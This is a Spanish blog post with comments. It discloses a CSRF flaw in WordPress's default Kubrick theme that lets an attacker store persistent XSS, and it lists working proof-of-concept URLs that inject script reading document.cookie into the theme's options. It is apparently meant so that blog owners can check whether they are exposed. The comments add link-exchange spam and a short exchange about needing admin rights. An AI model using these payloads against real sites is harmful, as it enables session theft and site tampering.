Kubrick, tema por omisión de WordPress, es vulnerable a ataques CSRF, esto tiene como consecuencia que un atacante pueda almacenar HTML arbitrario en sus opciones, si alguno de ustedes usa este tema, puede probar los siguientes ejemplos (o variantes) para determinar si su blog se ve afectado o no por este problema.
code:
XSS persistente que sólo funciona en IE
http://localhost/wp/wp-admin/themes.php?page=functions.php&action=save&fontcolor=expression(alert(document.cookie))
XSS persistente, funciona en todos los navegadores:
http://localhost/wp/wp-admin/themes.php?page=functions.php&action=save&headerimage='--></style><script>alert(document.cookie)</script>
http://localhost/wp/wp-admin/themes.php?page=functions.php&action=save&fontcolor=expression(alert(document.cookie))
XSS persistente, funciona en todos los navegadores:
http://localhost/wp/wp-admin/themes.php?page=functions.php&action=save&headerimage='--></style><script>alert(document.cookie)</script>
Es muy probable que otros temas también sean vulnerables a este tipo de ataques, por lo cual, si vuestro blog les importa, deben tener cuidado con los plugins y temas que instalan o usan.
Hola
te interesa un intercambio de enlaces¿?
mi blog es http://www.dttodo.com
si te interesa pon un enlace a mi blog con el nombre de Dttodo y yo pondre un enlace al tuyo con el nombre que me digas mediante un comentario en mi blog.
Saludos,
pero solo afecta eso si eres administrador, por que eh probado ese script en varios blog wordpress y todos me redireccionan a su login
#1: Este no es el lugar adecuado para hablar de estos temas, hubiera sido mejor que me enviaras un mail; sobre el intercambio de enlaces, nuestras páginas no tienen nada que ver, así que dudo mucho que vaya a servirle a alguno de los dos.
Luis: Obviamente que si, pero como indico en el texto de la entrada, esto se puede aprovechar usando CSRF.